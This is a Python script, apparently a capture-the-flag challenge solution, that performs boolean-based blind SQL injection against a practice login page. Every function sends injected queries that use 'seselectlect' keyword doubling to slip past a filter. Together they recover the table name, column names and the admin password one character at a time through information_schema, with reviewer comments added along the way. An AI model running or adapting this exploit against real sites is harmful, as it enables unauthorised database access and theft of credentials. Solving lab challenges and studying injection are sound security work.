def getTlen() -> int:
    """Return the length of the table name read from ``information_schema`` for the current database.

    Boolean-based blind probe: each request asserts one candidate length in the
    injected condition and the response text acts as the oracle. Lengths 1..30
    are tried; 0 is returned when none of them triggers the oracle.

    Uses the module globals ``session`` and ``url`` that ``main()`` assigns.
    """
    Tlen = 0
    for l in range(1,31):
        # This probe is percent-encoded by hand; the other functions send the
        # raw characters and let the HTTP library encode them.
        # The keyword is spelled "seselectlect" by the author, presumably so a
        # server-side keyword strip leaves a valid query behind (the filter is
        # not visible here). The durable server-side fix is a parameterised
        # query, not a longer blocklist.
        r = session.get(url + "?admin=admin%27%20and%20length((seselectlect%20table_name%20from%20information_schema.tables%20where%20table_schema=database()))={};--%20-&pass=&action=login".format(l))
        # The body is Chinese text; decode as GBK so the marker string below compares correctly.
        r.encoding = 'gbk'
        # "Login failed, wrong username and password" in the body is taken to
        # mean the injected condition evaluated true for this length.
        if r.text.find('登录失败,错误的用户名和密码') >=0:
            Tlen = l
            break
    return Tlen
def getT() -> str:
    """Recover the table name one character at a time.

    For every position 1..``getTlen()`` each character of the module-global
    alphabet ``payload`` is tried with ``mid(..., i, 1)``; the first character
    that makes the oracle fire is appended. A position where no character
    matches is silently skipped, so the result can be shorter than ``Tlen``.
    """
    Tlen = getTlen()
    #print("Tlen:",Tlen)
    Tname = ""
    for i in range(1,Tlen+1):
        for p in payload:
            r = session.get(url + "?admin=admin' and mid((seselectlect table_name from information_schema.tables where table_schema=database()),{},1)='{}';-- -&pass=&action=login".format(i,p))
            # Decode as GBK so the Chinese marker string compares correctly.
            r.encoding = 'gbk'
            # Oracle: the "login failed, wrong username and password" text
            # appears only when the injected comparison is true.
            if r.text.find('登录失败,错误的用户名和密码') >=0:
                Tname = Tname + p
                break
    return Tname
def getClen(Tname: str) -> list[int]:
    """Return the lengths of the first two column names of table ``Tname``.

    Column ``n`` (0 or 1) is selected with ``limit n,1`` from
    ``information_schema.columns``; candidate lengths are tried upward from 1
    until the oracle fires.

    NOTE(review): ``while i > 0`` has no upper bound. If the oracle never
    fires for a column (e.g. the subquery returns no row, or the marker
    text changes) this function never returns.
    """
    Clen=[]
    for n in range(0,2):
        i = 1
        while i > 0:
            r = session.get(url + "?admin=admin' and length((seselectlect column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1))={};-- -&pass=&action=login".format(Tname,n,i))
            # Decode as GBK so the Chinese marker string compares correctly.
            r.encoding = 'gbk'
            # Oracle: marker text present means the asserted length is right.
            if r.text.find('登录失败,错误的用户名和密码') >=0:
                Clen.append(i)
                break
            i = i + 1
    return Clen
def getC(Tname: str) -> list[str]:
    """Recover the names of the first two columns of table ``Tname``.

    Relies on ``getClen`` returning exactly two lengths (``Clen[0]`` and
    ``Clen[1]`` are indexed). Each position is resolved by trying every
    character of the module-global alphabet ``payload``; a position with no
    match is silently skipped.
    """
    Clen = getClen(Tname)
    #print("Clens:",Clen)
    Cnames = ['','']
    for n in range(0,2):
        for i in range(1, Clen[n]+1):
            for p in payload:
                r = session.get(url + "?admin=admin' and mid((seselectlect column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1),{},1)='{}';-- -&pass=&action=login".format(Tname,n,i,p))
                # Decode as GBK so the Chinese marker string compares correctly.
                r.encoding = 'gbk'
                # Oracle: marker text present means this character is correct.
                if r.text.find('登录失败,错误的用户名和密码') >=0:
                    Cnames[n] = Cnames[n] + p
                    break
    return Cnames

def getPlen(Tname: str, Cname: str) -> int:
    """Return the length of the value stored in column ``Cname`` of table ``Tname``.

    Candidate lengths are tried upward from 1 until the oracle fires.

    NOTE(review): as in ``getClen``, ``while i > 0`` is unbounded; if the
    oracle never fires the function never returns.
    """
    i = 1
    while i > 0:
        r = session.get(url + "?admin=admin' and length((seselectlect {} from {}))={};-- -&pass=&action=login".format(Cname, Tname, i))
        # Decode as GBK so the Chinese marker string compares correctly.
        r.encoding = 'gbk'
        if r.text.find('登录失败,错误的用户名和密码') >= 0:
            #print("Plen:",i)
            return i
        i = i + 1
def getPwd() -> str:
    """Recover the value of the second column of the discovered table, character by character.

    Chains ``getT`` -> ``getC`` -> ``getPlen`` and then resolves each position
    with the module-global alphabet ``payload``. The author takes the second
    column (``Cnames[1]``) to hold the password; a position with no matching
    character is silently skipped.
    """
    Tname = getT()
    Cnames = getC(Tname)
    # For this challenge the username is obviously "admin", so its value is not
    # brute-forced here.
    Plen = getPlen(Tname, Cnames[1])
    pwd = ""
    for i in range(1,Plen+1):
        for p in payload:
            r = session.get(url + "?admin=admin' and mid((seselectlect {} from {}),{},1)='{}';-- -&pass=&action=login".format(Cnames[1], Tname, i, p))
            # Decode as GBK so the Chinese marker string compares correctly.
            r.encoding = 'gbk'
            # Oracle: marker text present means this character is correct.
            if r.text.find('登录失败,错误的用户名和密码') >= 0:
                pwd = pwd + p
                break
    return pwd
def main() -> None:
    """Entry point: set the module globals the probe functions read, then print the result.

    ``url`` is the practice challenge's login endpoint, ``session`` a shared
    HTTP session so every probe reuses one connection/cookie jar, and
    ``payload`` the alphabet tried at each character position. The recovered
    value is printed with the ``admin:`` prefix.
    """
    global url
    global session
    global payload
    url = 'http://ctf5.shiyanbar.com/basic/inject/index.php'
    session = requests.Session()
    # Characters tried per position: letters, digits and a few punctuation
    # marks; anything outside this set can never be recovered by the probes.
    payload = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_,:-{}'"
    print("admin:",getPwd())